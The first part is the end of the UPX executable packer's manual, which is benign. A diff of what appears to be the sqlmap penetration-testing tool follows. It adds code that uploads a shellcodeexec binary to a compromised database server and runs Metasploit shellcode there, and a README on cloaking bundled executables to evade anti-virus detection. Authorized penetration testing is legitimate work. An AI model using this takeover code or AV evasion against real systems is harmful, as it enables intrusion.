<p>You can explicitly use the <strong>--no-env</strong> option to ignore the
environment variable.</p>
<p>
</p>
<hr />
<h1><a name="notes_for_the_supported_executable_formats">NOTES FOR THE SUPPORTED EXECUTABLE FORMATS</a></h1>
<p>
</p>
<h2><a name="notes_for_atari_tos">NOTES FOR ATARI/TOS</a></h2>
<p>This is the executable format used by the Atari ST/TT, a Motorola 68000
based personal computer which was popular in the late '80s. Support
of this format is only because of nostalgic feelings of one of
the authors and serves no practical purpose :-).
See <a href="http://www.freemint.de">http://www.freemint.de</a> for more info.</p>
<p>Packed programs will be byte-identical to the original after uncompression.
All debug information will be stripped, though.</p>
<p>Extra options available for this executable format:</p>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_bvmlinuz_i386">NOTES FOR BVMLINUZ/I386</a></h2>
<p>Same as vmlinuz/i386.</p>
<p>
</p>
<h2><a name="notes_for_dos_com">NOTES FOR DOS/COM</a></h2>
<p>Obviously <strong>UPX</strong> won't work with executables that want to read data from
themselves (like some commandline utilities that ship with Win95/98/ME).</p>
<p>Compressed programs only work on a 286+.</p>
<p>Packed programs will be byte-identical to the original after uncompression.</p>
<p>Maximum uncompressed size: ~65100 bytes.</p>
<p>Extra options available for this executable format:</p>
<pre>
--8086 Create an executable that works on any 8086 CPU.</pre>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--all-filters Compress the program several times, using all
available preprocessing filters. This may improve
the compression ratio in some cases, but usually
the default filter gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_dos_exe">NOTES FOR DOS/EXE</a></h2>
<p>dos/exe stands for all ``normal'' 16-bit DOS executables.</p>
<p>Obviously <strong>UPX</strong> won't work with executables that want to read data from
themselves (like some command line utilities that ship with Win95/98/ME).</p>
<p>Compressed programs only work on a 286+.</p>
<p>Extra options available for this executable format:</p>
<pre>
--8086 Create an executable that works on any 8086 CPU.</pre>
<pre>
--no-reloc Use no relocation records in the exe header.</pre>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_dos_sys">NOTES FOR DOS/SYS</a></h2>
<p>Compressed programs only work on a 286+.</p>
<p>Packed programs will be byte-identical to the original after uncompression.</p>
<p>Maximum uncompressed size: ~65350 bytes.</p>
<p>Extra options available for this executable format:</p>
<pre>
--8086 Create an executable that works on any 8086 CPU.</pre>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--all-filters Compress the program several times, using all
available preprocessing filters. This may improve
the compression ratio in some cases, but usually
the default filter gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_djgpp2_coff">NOTES FOR DJGPP2/COFF</a></h2>
<p>First of all, it is recommended to use <strong>UPX</strong> *instead* of <strong>strip</strong>. strip has
the very bad habit of replacing your stub with its own (outdated) version.
Additionally <strong>UPX</strong> corrects a bug/feature in strip v2.8.x: it
will fix the 4 KiB alignment of the stub.</p>
<p><strong>UPX</strong> includes the full functionality of stubify. This means it will
automatically stubify your COFF files. Use the option <strong>--coff</strong> to
disable this functionality (see below).</p>
<p><strong>UPX</strong> automatically handles Allegro packfiles.</p>
<p>The DLM format (a rather exotic shared library extension) is not supported.</p>
<p>Packed programs will be byte-identical to the original after uncompression.
All debug information and trailing garbage will be stripped, though.</p>
<p>Extra options available for this executable format:</p>
<pre>
--coff Produce COFF output instead of EXE. By default
UPX keeps your current stub.</pre>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--all-filters Compress the program several times, using all
available preprocessing filters. This may improve
the compression ratio in some cases, but usually
the default filter gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_linux__general_">NOTES FOR LINUX [general]</a></h2>
<p>Introduction</p>
<pre>
Linux/386 support in UPX consists of 3 different executable formats,
one optimized for ELF executables (&quot;linux/elf386&quot;), one optimized
for shell scripts (&quot;linux/sh386&quot;), and one generic format
(&quot;linux/386&quot;).</pre>
<pre>
We will start with a general discussion first, but please
also read the relevant docs for each of the individual formats.</pre>
<pre>
Also, there is special support for bootable kernels - see the
description of the vmlinuz/386 format.</pre>
<p>General user's overview</p>
<pre>
Running a compressed executable program trades less space on a
``permanent'' storage medium (such as a hard disk, floppy disk,
CD-ROM, flash memory, EPROM, etc.) for more space in one or more
``temporary'' storage media (such as RAM, swap space, /tmp, etc.).
Running a compressed executable also requires some additional CPU
cycles to generate the compressed executable in the first place,
and to decompress it at each invocation.</pre>
<pre>
How much space is traded? It depends on the executable, but many
programs save 30% to 50% of permanent disk space. How much CPU
overhead is there? Again, it depends on the executable, but
decompression speed generally is at least many megabytes per second,
and frequently is limited by the speed of the underlying disk
or network I/O.</pre>
<pre>
Depending on the statistics of usage and access, and the relative
speeds of CPU, RAM, swap space, /tmp, and file system storage, then
invoking and running a compressed executable can be faster than
directly running the corresponding uncompressed program.
The operating system might perform fewer expensive I/O operations
to invoke the compressed program. Paging to or from swap space
or /tmp might be faster than paging from the general file system.
``Medium-sized'' programs which access about 1/3 to 1/2 of their
stored program bytes can do particularly well with compression.
Small programs tend not to benefit as much because the absolute
savings is less. Big programs tend not to benefit proportionally
because each invocation may use only a small fraction of the program,
yet UPX decompresses the entire program before invoking it.
But in environments where disk or flash memory storage is limited,
then compression may win anyway.</pre>
<pre>
Currently, executables compressed by UPX do not share RAM at runtime
in the way that executables mapped from a file system do. As a
result, if the same program is run simultaneously by more than one
process, then using the compressed version will require more RAM and/or
swap space. So, shell programs (bash, csh, etc.) and ``make''
might not be good candidates for compression.</pre>
<pre>
UPX recognizes three executable formats for Linux: Linux/elf386,
Linux/sh386, and Linux/386. Linux/386 is the most generic format;
it accommodates any file that can be executed. At runtime, the UPX
decompression stub re-creates in /tmp a copy of the original file,
and then the copy is (re-)executed with the same arguments.
ELF binary executables prefer the Linux/elf386 format by default,
because UPX decompresses them directly into RAM, uses only one
exec, does not use space in /tmp, and does not use /proc.
Shell scripts where the underlying shell accepts a ``-c'' argument
can use the Linux/sh386 format. UPX decompresses the shell script
into low memory, then maps the shell and passes the entire text of the
script as an argument with a leading ``-c''.</pre>
<p>General benefits:</p>
<pre>
- UPX can compress all executables, be it AOUT, ELF, libc4, libc5,
libc6, Shell/Perl/Python/... scripts, standalone Java .class
binaries, or whatever...
All scripts and programs will work just as before.</pre>
<pre>
- Compressed programs are completely self-contained. No need for
any external program.</pre>
<pre>
- UPX keeps your original program untouched. This means that
after decompression you will have a byte-identical version,
and you can use UPX as a file compressor just like gzip.
[ Note that UPX maintains a checksum of the file internally,
so it is indeed a reliable alternative. ]</pre>
<pre>
- As the stub only uses syscalls and isn't linked against libc it
should run under any Linux configuration that can run ELF
binaries.</pre>
<pre>
- For the same reason compressed executables should run under
FreeBSD and other systems which can run Linux binaries.
[ Please send feedback on this topic ]</pre>
<p>General drawbacks:</p>
<pre>
- It is not advisable to compress programs which usually have many
instances running (like `sh' or `make') because the common segments of
compressed programs won't be shared any longer between different
processes.</pre>
<pre>
- `ldd' and `size' won't show anything useful because all they
see is the statically linked stub. Since version 0.82 the section
headers are stripped from the UPX stub and `size' doesn't even
recognize the file format. The file patches/patch-elfcode.h has a
patch to fix this bug in `size' and other programs which use GNU BFD.</pre>
<p>General notes:</p>
<pre>
- As UPX leaves your original program untouched it is advantageous
to strip it before compression.</pre>
<pre>
- If you compress a script you will lose platform independence -
this could be a problem if you are using NFS mounted disks.</pre>
<pre>
- Compression of suid, guid and sticky-bit programs is rejected
because of possible security implications.</pre>
<pre>
- For the same reason there is no sense in making any compressed
program suid.</pre>
<pre>
- Obviously UPX won't work with executables that want to read data
from themselves. E.g., this might be a problem for Perl scripts
which access their __DATA__ lines.</pre>
<pre>
- In case of internal errors the stub will abort with exitcode 127.
Typical reasons for this to happen are that the program has somehow
been modified after compression.
Running `strace -o strace.log compressed_file' will tell you more.</pre>
<p>
</p>
<h2><a name="notes_for_linux_elf386">NOTES FOR LINUX/ELF386</a></h2>
<p>Please read the general Linux description first.</p>
<p>The linux/elf386 format decompresses directly into RAM,
uses only one exec, does not use space in /tmp,
and does not use /proc.</p>
<p>Linux/elf386 is automatically selected for Linux ELF executables.</p>
<p>Packed programs will be byte-identical to the original after uncompression.</p>
<p>How it works:</p>
<pre>
For ELF executables, UPX decompresses directly to memory, simulating
the mapping that the operating system kernel uses during exec(),
including the PT_INTERP program interpreter (if any).
The brk() is set by a special PT_LOAD segment in the compressed
executable itself. UPX then wipes the stack clean except for
arguments, environment variables, and Elf_auxv entries (this is
required by bugs in the startup code of /lib/ld-linux.so as of
May 2000), and transfers control to the program interpreter or
the e_entry address of the original executable.</pre>
<pre>
The UPX stub is about 1700 bytes long, partly written in assembler
and only uses kernel syscalls. It is not linked against any libc.</pre>
<p>Specific drawbacks:</p>
<pre>
- For linux/elf386 and linux/sh386 formats, you will be relying on
RAM and swap space to hold all of the decompressed program during
the lifetime of the process. If you already use most of your swap
space, then you may run out. A system that is &quot;out of memory&quot;
can become fragile. Many programs do not react gracefully when
malloc() returns 0. With newer Linux kernels, the kernel
may decide to kill some processes to regain memory, and you
may not like the kernel's choice of which to kill. Running
/usr/bin/top is one way to check on the usage of swap space.</pre>
<p>Extra options available for this executable format:</p>
<pre>
(none)</pre>
<p>
</p>
<h2><a name="notes_for_linux_sh386">NOTES FOR LINUX/SH386</a></h2>
<p>Please read the general Linux description first.</p>
<p>Shell scripts where the underling shell accepts a ``-c'' argument
can use the Linux/sh386 format. <strong>UPX</strong> decompresses the shell script
into low memory, then maps the shell and passes the entire text of the
script as an argument with a leading ``-c''.
It does not use space in /tmp, and does not use /proc.</p>
<p>Linux/sh386 is automatically selected for shell scripts that
use a known shell.</p>
<p>Packed programs will be byte-identical to the original after uncompression.</p>
<p>How it works:</p>
<pre>
For shell script executables (files beginning with &quot;#!/&quot; or &quot;#! /&quot;)
where the shell is known to accept &quot;-c &lt;command&gt;&quot;, UPX decompresses
the file into low memory, then maps the shell (and its PT_INTERP),
and passes control to the shell with the entire decompressed file
as the argument after &quot;-c&quot;. Known shells are sh, ash, bash, bsh, csh,
ksh, tcsh, pdksh. Restriction: UPX cannot use this method
for shell scripts which use the one optional string argument after
the shell name in the script (example: &quot;#! /bin/sh option3\n&quot;.)</pre>
<pre>
The UPX stub is about 1700 bytes long, partly written in assembler
and only uses kernel syscalls. It is not linked against any libc.</pre>
<p>Specific drawbacks:</p>
<pre>
- For linux/elf386 and linux/sh386 formats, you will be relying on
RAM and swap space to hold all of the decompressed program during
the lifetime of the process. If you already use most of your swap
space, then you may run out. A system that is &quot;out of memory&quot;
can become fragile. Many programs do not react gracefully when
malloc() returns 0. With newer Linux kernels, the kernel
may decide to kill some processes to regain memory, and you
may not like the kernel's choice of which to kill. Running
/usr/bin/top is one way to check on the usage of swap space.</pre>
<p>Extra options available for this executable format:</p>
<pre>
(none)</pre>
<p>
</p>
<h2><a name="notes_for_linux_386">NOTES FOR LINUX/386</a></h2>
<p>Please read the general Linux description first.</p>
<p>The generic linux/386 format decompresses to /tmp and needs
/proc file system support. It starts the decompressed program
via the <code>execve()</code> syscall.</p>
<p>Linux/386 is only selected if the specialized linux/elf386
and linux/sh386 won't recognize a file.</p>
<p>Packed programs will be byte-identical to the original after uncompression.</p>
<p>How it works:</p>
<pre>
For files which are not ELF and not a script for a known &quot;-c&quot; shell,
UPX uses kernel execve(), which first requires decompressing to a
temporary file in the file system. Interestingly -
because of the good memory management of the Linux kernel - this
often does not introduce a noticeable delay, and in fact there
will be no disk access at all if you have enough free memory as
the entire process takes places within the file system buffers.</pre>
<pre>
A compressed executable consists of the UPX stub and an overlay
which contains the original program in a compressed form.</pre>
<pre>
The UPX stub is a statically linked ELF executable and does
the following at program startup:</pre>
<pre>
1) decompress the overlay to a temporary location in /tmp
2) open the temporary file for reading
3) try to delete the temporary file and start (execve)
the uncompressed program in /tmp using /proc/&lt;pid&gt;/fd/X as
attained by step 2)
4) if that fails, fork off a subprocess to clean up and
start the program in /tmp in the meantime</pre>
<pre>
The UPX stub is about 1700 bytes long, partly written in assembler
and only uses kernel syscalls. It is not linked against any libc.</pre>
<p>Specific drawbacks:</p>
<pre>
- You need additional free disk space for the uncompressed program
in your /tmp directory. This program is deleted immediately after
decompression, but you still need it for the full execution time
of the program.</pre>
<pre>
- You must have /proc file system support as the stub wants to open
/proc/&lt;pid&gt;/exe and needs /proc/&lt;pid&gt;/fd/X. This also means that you
cannot compress programs that are used during the boot sequence
before /proc is mounted.</pre>
<pre>
- Utilities like `top' will display numerical values in the process
name field. This is because Linux computes the process name from
the first argument of the last execve syscall (which is typically
something like /proc/&lt;pid&gt;/fd/3).</pre>
<pre>
- Because of temporary decompression to disk the decompression speed
is not as fast as with the other executable formats. Still, I can see
no noticeable delay when starting programs like my ~3 MiB emacs (which
is less than 1 MiB when compressed :-).</pre>
<p>Extra options available for this executable format:</p>
<pre>
--force-execve Force the use of the generic linux/386 &quot;execve&quot;
format, i.e. do not try the linux/elf386 and
linux/sh386 formats.</pre>
<p>
</p>
<h2><a name="notes_for_ps1_exe">NOTES FOR PS1/EXE</a></h2>
<p>This is the executable format used by the Sony PlayStation (PSone),
a Mips R3000 based gaming console which is popular since the late '90s.
Support of this format is very similar to the Atari one, because of
nostalgic feelings of one of the authors.</p>
<p>Packed programs will be byte-identical to the original after uncompression,
until further notice.</p>
<p>Maximum uncompressed size: ~1.89 / ~7.60 MiB.</p>
<p>Notes:</p>
<pre>
- UPX creates as default a suitable executable for CD-Mastering
and console transfer. For a CD-Master main executable you could also try
the special option &quot;--boot-only&quot; as described below.
It has been reported that upx packed executables are fully compatible with
the Sony PlayStation 2 (PS2, PStwo) and Sony PlayStation Portable (PSP) in
Sony PlayStation (PSone) emulation mode.</pre>
<pre>
- Normally the packed files use the same memory areas like the uncompressed
versions, so they will not override other memory areas while unpacking.
If this isn't possible UPX will abort showing a 'packed data overlap'
error. With the &quot;--force&quot; option UPX will relocate the loading address
for the packed file, but this isn't a real problem if it is a single or
the main executable.</pre>
<p>Extra options available for this executable format:</p>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--8-bit Uses 8 bit size compression [default: 32 bit]</pre>
<pre>
--8mib-ram PSone has 8 MiB ram available [default: 2 MiB]</pre>
<pre>
--boot-only This format is for main exes and CD-Mastering only !
It may slightly improve the compression ratio,
decompression routines are faster than default ones.
But it cannot be used for console transfer !</pre>
<pre>
--no-align This option disables CD mode 2 data sector format
alignment. May slightly improves the compression ratio,
but the compressed executable will not boot from a CD.
Use it for console transfer only !</pre>
<p>
</p>
<h2><a name="notes_for_rtm32_pe_and_arm_pe">NOTES FOR RTM32/PE and ARM/PE</a></h2>
<p>Same as win32/pe.</p>
<p>
</p>
<h2><a name="notes_for_tmt_adam">NOTES FOR TMT/ADAM</a></h2>
<p>This format is used by the TMT Pascal compiler - see <a href="http://www.tmt.com/">http://www.tmt.com/</a> .</p>
<p>Extra options available for this executable format:</p>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--all-filters Compress the program several times, using all
available preprocessing filters. This may improve
the compression ratio in some cases, but usually
the default filter gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_vmlinuz_386">NOTES FOR VMLINUZ/386</a></h2>
<p>The vmlinuz/386 and bvmlinuz/386 formats take a gzip-compressed
bootable Linux kernel image (``vmlinuz'', ``zImage'', ``bzImage''),
gzip-decompress it and re-compress it with the <strong>UPX</strong> compression method.</p>
<p>vmlinuz/386 is completely unrelated to the other Linux executable
formats, and it does not share any of their drawbacks.</p>
<p>Notes:</p>
<pre>
- Be sure that &quot;vmlinuz/386&quot; or &quot;bvmlinuz/386&quot; is displayed
during compression - otherwise a wrong executable format
may have been used, and the kernel won't boot.</pre>
<p>Benefits:</p>
<pre>
- Better compression (but note that the kernel was already compressed,
so the improvement is not as large as with other formats).
Still, the bytes saved may be essential for special needs like
boot disks.</pre>
<pre>
For example, this is what I get for my 2.2.16 kernel:
1589708 vmlinux
641073 bzImage [original]
560755 bzImage.upx [compressed by &quot;upx -9&quot;]</pre>
<pre>
- Much faster decompression at kernel boot time (but kernel
decompression speed is not really an issue these days).</pre>
<p>Drawbacks:</p>
<pre>
(none)</pre>
<p>Extra options available for this executable format:</p>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--all-filters Compress the program several times, using all
available preprocessing filters. This may improve
the compression ratio in some cases, but usually
the default filter gives the best results anyway.</pre>
<p>
</p>
<h2><a name="notes_for_watcom_le">NOTES FOR WATCOM/LE</a></h2>
<p><strong>UPX</strong> has been successfully tested with the following extenders:
DOS4G, DOS4GW, PMODE/W, DOS32a, CauseWay.
The WDOS/X extender is partly supported (for details
see the file bugs BUGS).</p>
<p>DLLs and the LX format are not supported.</p>
<p>Extra options available for this executable format:</p>
<pre>
--le Produce an unbound LE output instead of
keeping the current stub.</pre>
<p>
</p>
<h2><a name="notes_for_win32_pe">NOTES FOR WIN32/PE</a></h2>
<p>The PE support in <strong>UPX</strong> is quite stable now, but probably there are
still some incompatibilities with some files.</p>
<p>Because of the way <strong>UPX</strong> (and other packers for this format) works, you
can see increased memory usage of your compressed files because the whole
program is loaded into memory at startup.
If you start several instances of huge compressed programs you're
wasting memory because the common segments of the program won't
get shared across the instances.
On the other hand if you're compressing only smaller programs, or
running only one instance of larger programs, then this penalty is
smaller, but it's still there.</p>
<p>If you're running executables from network, then compressed programs
will load faster, and require less bandwidth during execution.</p>
<p>DLLs are supported. But UPX compressed DLLs can not share common data and
code when they got used by multiple applications. So compressing msvcrt.dll
is a waste of memory, but compressing the dll plugins of a particular
application may be a better idea.</p>
<p>Screensavers are supported, with the restriction that the filename
must end with ``.scr'' (as screensavers are handled slightly different
than normal exe files).</p>
<p>UPX compressed PE files have some minor memory overhead (usually in the
10 - 30 KiB range) which can be seen by specifying the ``-i'' command
line switch during compression.</p>
<p>Extra options available for this executable format:</p>
<pre>
--compress-exports=0 Don't compress the export section.
Use this if you plan to run the compressed
program under Wine.
--compress-exports=1 Compress the export section. [DEFAULT]
Compression of the export section can improve the
compression ratio quite a bit but may not work
with all programs (like winword.exe).
UPX never compresses the export section of a DLL
regardless of this option.</pre>
<pre>
--compress-icons=0 Don't compress any icons.
--compress-icons=1 Compress all but the first icon.
--compress-icons=2 Compress all icons which are not in the
first icon directory. [DEFAULT]
--compress-icons=3 Compress all icons.</pre>
<pre>
--compress-resources=0 Don't compress any resources at all.</pre>
<pre>
--keep-resource=list Don't compress resources specified by the list.
The members of the list are separated by commas.
A list member has the following format: I&lt;type[/name]&gt;.
I&lt;Type&gt; is the type of the resource. Standard types
must be specified as decimal numbers, user types can be
specified by decimal IDs or strings. I&lt;Name&gt; is the
identifier of the resource. It can be a decimal number
or a string. For example:</pre>
<pre>
--keep-resource=2/MYBITMAP,5,6/12345</pre>
<pre>
UPX won't compress the named bitmap resource &quot;MYBITMAP&quot;,
it leaves every dialog (5) resource uncompressed, and
it won't touch the string table resource with identifier
12345.</pre>
<pre>
--force Force compression even when there is an
unexpected value in a header field.
Use with care.</pre>
<pre>
--strip-relocs=0 Don't strip relocation records.
--strip-relocs=1 Strip relocation records. [DEFAULT]
This option only works on executables with base
address greater or equal to 0x400000. Usually the
compressed files becomes smaller, but some files
may become larger. Note that the resulting file will
not work under Windows 3.x (Win32s).
UPX never strips relocations from a DLL
regardless of this option.</pre>
<pre>
--all-methods Compress the program several times, using all
available compression methods. This may improve
the compression ratio in some cases, but usually
the default method gives the best results anyway.</pre>
<pre>
--all-filters Compress the program several times, using all
available preprocessing filters. This may improve
the compression ratio in some cases, but usually
the default filter gives the best results anyway.</pre>
<p>
</p>
<hr />
<h1><a name="diagnostics">DIAGNOSTICS</a></h1>
<p>Exit status is normally 0; if an error occurs, exit status
is 1. If a warning occurs, exit status is 2.</p>
<p><strong>UPX</strong>'s diagnostics are intended to be self-explanatory.</p>
<p>
</p>
<hr />
<h1><a name="bugs">BUGS</a></h1>
<p>Please report all bugs immediately to the authors.</p>
<p>
</p>
<hr />
<h1><a name="authors">AUTHORS</a></h1>
<pre>
Markus F.X.J. Oberhumer &lt;markus@oberhumer.com&gt;
<a href="http://www.oberhumer.com">http://www.oberhumer.com</a></pre>
<pre>
Laszlo Molnar &lt;ml1050@users.sourceforge.net&gt;</pre>
<pre>
John F. Reiser &lt;jreiser@BitWagon.com&gt;</pre>
<pre>
Jens Medoch &lt;jssg@users.sourceforge.net&gt;</pre>
<p>
</p>
<hr />
<h1><a name="copyright">COPYRIGHT</a></h1>
<p>Copyright (C) 1996-2008 Markus Franz Xaver Johannes Oberhumer</p>
<p>Copyright (C) 1996-2008 Laszlo Molnar</p>
<p>Copyright (C) 2000-2008 John F. Reiser</p>
<p>Copyright (C) 2002-2008 Jens Medoch</p>
<p>This program may be used freely, and you are welcome to
redistribute it under certain conditions.</p>
<p>This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
<strong>UPX License Agreement</strong> for more details.</p>
<p>You should have received a copy of the UPX License Agreement along
with this program; see the file LICENSE. If not, visit the UPX home page.</p>
</body>
</html>

BIN
lib/contrib/upx/linux/upx_
View File

Binary file not shown.

BIN
lib/contrib/upx/macosx/upx_
View File

Binary file not shown.

11
lib/contrib/upx/windows/README.txt
View File

@ -1,11 +0,0 @@
Due to the anti-virus positive detection of executable stored inside this
folder, we needed to somehow circumvent this. As from the plain sqlmap
users perspective nothing has to be done prior to its usage by sqlmap, but
if you want to have access to the original executable use the decrypt
functionality of the ../../../../extra/cloak/cloak.py utility.
To prepare the executable to the cloaked form use this command:
python ../../../../extra/cloak/cloak.py -i upx.exe
To get back the original executable use this:
python ../../../../extra/cloak/cloak.py -d -i upx.exe_

BIN
lib/contrib/upx/windows/upx.exe_
View File

Binary file not shown.

33
lib/core/common.py
View File

@ -331,6 +331,28 @@ class Backend:
return kb.os
@staticmethod
def setArch():
msg = "what is the back-end database management system architecture?"
msg += "\n[1] 32-bit (default)"
msg += "\n[2] 64-bit"
while True:
arch = readInput(msg, default='1')
if isinstance(arch, basestring) and arch.isdigit() and int(arch) in ( 1, 2 ):
if int(arch) == 1:
kb.arch = 32
else:
kb.arch = 64
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
logger.warn(warnMsg)
return kb.arch
# Get methods
@staticmethod
def getForcedDbms():
@ -389,6 +411,13 @@ class Backend:
def getOs():
return kb.os
@staticmethod
def getArch():
if kb.arch is None:
Backend.setArch()
return kb.arch
# Comparison methods
@staticmethod
def isDbms(dbms):
@ -867,7 +896,6 @@ def cleanQuery(query):
def setPaths():
# sqlmap paths
paths.SQLMAP_CONTRIB_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "contrib")
paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra")
paths.SQLMAP_SHELL_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "shell")
paths.SQLMAP_TXT_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "txt")
@ -877,6 +905,7 @@ def setPaths():
paths.SQLMAP_OUTPUT_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "output")
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
paths.SQLMAP_SEXEC_PATH = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec")
# sqlmap files
paths.SQLMAP_HISTORY = os.path.join(paths.SQLMAP_ROOT_PATH, ".sqlmap_history")
@ -2535,6 +2564,7 @@ def unsafeSQLIdentificatorNaming(name):
"""
retVal = name
if isinstance(name, basestring):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = name.replace("`", "")
@ -2542,6 +2572,7 @@ def unsafeSQLIdentificatorNaming(name):
retVal = name.replace("\"", "")
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
retVal = retVal.lstrip("%s." % DEFAULT_MSSQL_SCHEMA)
return retVal
def isBinaryData(value):

1
lib/core/option.py
View File

@ -1268,6 +1268,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.absFilePaths = set()
kb.adjustTimeDelay = False
kb.arch = None
kb.authHeader = None
kb.bannerFp = advancedDict()

120
lib/takeover/metasploit.py
View File

@ -31,6 +31,7 @@ from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import sqlmapDataException
@ -41,7 +42,6 @@ from lib.core.subprocessng import blockingWriteToFD
from lib.core.subprocessng import pollProcess
from lib.core.subprocessng import setNonBlocking
from lib.request.connect import Connect as Request
from lib.takeover.upx import upx
class Metasploit:
@ -391,15 +391,15 @@ class Metasploit:
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def __runMsfPayloadRemote(self):
infoMsg = "running Metasploit Framework 3 payload stager "
infoMsg += "remotely, please wait.."
def __runMsfShellcodeRemoteViaSexec(self):
infoMsg = "running Metasploit Framework 3 shellcode remotely "
infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg)
if not Backend.isOs(OS.WINDOWS):
self.execCmd("chmod +x %s" % self.exeFilePathRemote, silent=True)
self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True)
cmd = "%s &" % self.exeFilePathRemote
cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
self.execCmd(cmd, silent=True)
@ -437,7 +437,6 @@ class Metasploit:
proc.stdin.write("list_tokens -u\n")
proc.stdin.write("getuid\n")
def __controlMsfCmd(self, proc, func):
stdin_fd = sys.stdin.fileno()
setNonBlocking(stdin_fd)
@ -536,100 +535,31 @@ class Metasploit:
os.unlink(self.__shellcodeFilePath)
def createMsfPayloadStager(self, initialize=True):
if initialize:
infoMsg = ""
else:
infoMsg = "re"
infoMsg += "creating Metasploit Framework 3 payload stager"
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = paths.SQLMAP_SEXEC_PATH
if Backend.isOs(OS.WINDOWS):
self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s.exe" % self.__randStr)
# Metasploit developers added support for the old exe format
# to msfencode using '-t exe-small' (>= 3.3.3-dev),
# http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
if Backend.getIdentifiedDbms() == DBMS.PGSQL:
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
self.shellcodeexecLocal += "/windows/shellcodeexec/shellcodeexec.x%s.exe" % Backend.getArch()
else:
self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
self.__fileFormat = "elf"
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch()
if initialize:
self.__initVars()
if self.payloadStr is None:
self.__prepareIngredients()
self.__forgeMsfPayloadCmd("process", self.__fileFormat, self.exeFilePathLocal)
logger.debug("executing local command: %s" % self.__payloadCmd)
process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
if Backend.isOs(OS.WINDOWS):
payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
os.chmod(self.exeFilePathLocal, stat.S_IRWXU)
if payloadSize:
payloadSize = payloadSize.group(1)
exeSize = os.path.getsize(self.exeFilePathLocal)
# Only pack the payload stager if the back-end DBMS operating
# system is Windows and new portable executable template is
# used
if self.__fileFormat == "exe":
packedSize = upx.pack(self.exeFilePathLocal)
else:
packedSize = None
debugMsg = "the encoded payload size is %s bytes, " % payloadSize
if packedSize and packedSize < exeSize:
debugMsg += "as a compressed portable executable its size "
debugMsg += "is %d bytes, decompressed it " % packedSize
debugMsg += "was %s bytes large" % exeSize
else:
debugMsg += "as a portable executable its size is "
debugMsg += "%s bytes" % exeSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the payload stager (%s)" % payloadStderr
raise sqlmapFilePathException, errMsg
def uploadMsfPayloadStager(self, web=False):
if web:
self.exeFilePathRemote = "%s/%s" % (self.webDirectory, os.path.basename(self.exeFilePathLocal))
else:
self.exeFilePathRemote = "%s/%s" % (conf.tmpPath, os.path.basename(self.exeFilePathLocal))
self.exeFilePathRemote = ntToPosixSlashes(normalizePath(self.exeFilePathRemote))
logger.info("uploading payload stager to '%s'" % self.exeFilePathRemote)
# TODO: until web.py's __webFileStreamUpload() method does not consider the destFileName
#__basename = "tmpse%s%s" % (self.__randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
__basename = os.path.basename(self.shellcodeexecLocal)
if web:
self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, self.webDirectory)
self.shellcodeexecRemote = "%s/%s" % (self.webDirectory, __basename)
else:
